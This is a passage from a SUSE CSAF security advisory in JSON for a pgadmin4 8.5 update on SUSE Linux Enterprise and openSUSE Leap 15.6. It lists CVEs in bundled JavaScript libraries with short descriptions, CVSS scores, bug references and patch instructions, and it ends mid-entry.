"product_id": "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
},
"product_reference": "system-user-pgadmin-8.5-150600.3.6.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Python 3 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-8.5-150600.3.6.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch"
},
"product_reference": "pgadmin4-8.5-150600.3.6.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-cloud-8.5-150600.3.6.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch"
},
"product_reference": "pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-desktop-8.5-150600.3.6.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch"
},
"product_reference": "pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-doc-8.5-150600.3.6.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch"
},
"product_reference": "pgadmin4-doc-8.5-150600.3.6.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch"
},
"product_reference": "pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "system-user-pgadmin-8.5-150600.3.6.1.noarch as component of openSUSE Leap 15.6",
"product_id": "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
},
"product_reference": "system-user-pgadmin-8.5-150600.3.6.1.noarch",
"relates_to_product_reference": "openSUSE Leap 15.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-38355",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-38355"
}
],
"notes": [
{
"category": "general",
"text": "Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. This issue is fixed by commit `15af22fc22` which has been included in `socket.io@4.6.2` (released in May 2023). The fix was backported in the 2.x branch as well with commit `d30630ba10`. Users are advised to upgrade. Users unable to upgrade may attach a listener for the \"error\" event to catch these errors.\n",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-38355",
"url": "https://www.suse.com/security/cve/CVE-2024-38355"
},
{
"category": "external",
"summary": "SUSE Bug 1226965 for CVE-2024-38355",
"url": "https://bugzilla.suse.com/1226965"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-10-29T12:55:34Z",
"details": "important"
}
],
"title": "CVE-2024-38355"
},
{
"cve": "CVE-2024-38998",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-38998"
}
],
"notes": [
{
"category": "general",
"text": "DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-38998",
"url": "https://www.suse.com/security/cve/CVE-2024-38998"
},
{
"category": "external",
"summary": "SUSE Bug 1227247 for CVE-2024-38998",
"url": "https://bugzilla.suse.com/1227247"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.6,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-10-29T12:55:34Z",
"details": "important"
}
],
"title": "CVE-2024-38998"
},
{
"cve": "CVE-2024-38999",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-38999"
}
],
"notes": [
{
"category": "general",
"text": "jrburke requirejs v2.3.6 was discovered to contain a prototype pollution via the function s.contexts._.configure. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-38999",
"url": "https://www.suse.com/security/cve/CVE-2024-38999"
},
{
"category": "external",
"summary": "SUSE Bug 1227251 for CVE-2024-38999",
"url": "https://bugzilla.suse.com/1227251"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.6,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-10-29T12:55:34Z",
"details": "important"
}
],
"title": "CVE-2024-38999"
},
{
"cve": "CVE-2024-39338",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-39338"
}
],
"notes": [
{
"category": "general",
"text": "axios 1.7.2 allows SSRF via unexpected behavior where requests for path relative URLs get processed as protocol relative URLs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-39338",
"url": "https://www.suse.com/security/cve/CVE-2024-39338"
},
{
"category": "external",
"summary": "SUSE Bug 1229421 for CVE-2024-39338",
"url": "https://bugzilla.suse.com/1229421"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-10-29T12:55:34Z",
"details": "important"
}
],
"title": "CVE-2024-39338"
},
{
"cve": "CVE-2024-4067",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-4067"
}
],
"notes": [
{
"category": "general",
"text": "The NPM package `micromatch` prior to 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in `micromatch.braces()` in `index.js` because the pattern `.*` will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn\u0027t find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix but further testing shows the issue persists. This issue should be mitigated by using a safe pattern that won\u0027t start backtracking the regular expression due to greedy matching. This issue was fixed in version 4.0.8.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-4067",
"url": "https://www.suse.com/security/cve/CVE-2024-4067"
},
{
"category": "external",
"summary": "SUSE Bug 1224255 for CVE-2024-4067",
"url": "https://bugzilla.suse.com/1224255"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-10-29T12:55:34Z",
"details": "important"
}
],
"title": "CVE-2024-4067"
},
{
"cve": "CVE-2024-4068",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-4068"
}
],
"notes": [
{
"category": "general",
"text": "The NPM package `braces`, versions prior to 3.0.3, fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In `lib/parse.js,` if a malicious user sends \"imbalanced braces\" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-4068",
"url": "https://www.suse.com/security/cve/CVE-2024-4068"
},
{
"category": "external",
"summary": "SUSE Bug 1224256 for CVE-2024-4068",
"url": "https://bugzilla.suse.com/1224256"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-10-29T12:55:34Z",
"details": "important"
}
],
"title": "CVE-2024-4068"
},
{
"cve": "CVE-2024-43788",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-43788"
}
],
"notes": [
{
"category": "general",
"text": "Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack\u0027s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-43788",
"url": "https://www.suse.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "SUSE Bug 1229860 for CVE-2024-43788",
"url": "https://bugzilla.suse.com/1229860"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch",
"openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-10-29T12:55:34Z",
"details": "moderate"
}
],
"title": "CVE-2024-43788"
},
{
"cve": "CVE-2024-48948",
"ids": [
{
"system_name": "SUSE CVE Page",
